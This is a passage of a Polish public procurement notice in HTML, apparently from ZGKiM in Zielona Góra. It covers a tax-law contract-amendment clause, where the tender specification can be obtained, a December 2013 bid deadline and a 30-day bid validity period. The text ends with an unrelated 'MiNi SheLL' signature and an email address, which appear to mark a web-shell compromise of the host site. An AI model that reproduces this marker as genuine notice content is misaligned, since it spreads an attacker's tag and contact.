-  możliwość zmiany umowy w sprawie udzielenia zamówienia publicznego w razie zmiany w przepisach prawa podatkowego, które dotyczą świadczenia usług lub dokonywania dostaw stanowiących przedmiot umowy , w szczególności zmian w zakresie ustawy z dnia 11 marca 2004r    o podatku od towarów i usług , przepisów wykonawczych do niej lub aktów prawnych, które tę ustawę lub przepisy wykonawcze zastąpią. Warunkiem zmiany umowy jest wystąpienie w okresie obowiązywania umowy takiej zmiany w przepisach prawa podatkowego, która wpływa na obowiązek lub uprawnienia którejkolwiek ze Stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgkim.zgora.pl w zakładce zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego ZGKiM ul. Zjednoczenia 110, Zielona Góra, pokój 101.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2013 godzina 08:00, miejsce: Oferty należy skadac w siedzibie Zamawiającego pokój 101 lub w kancelarii.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com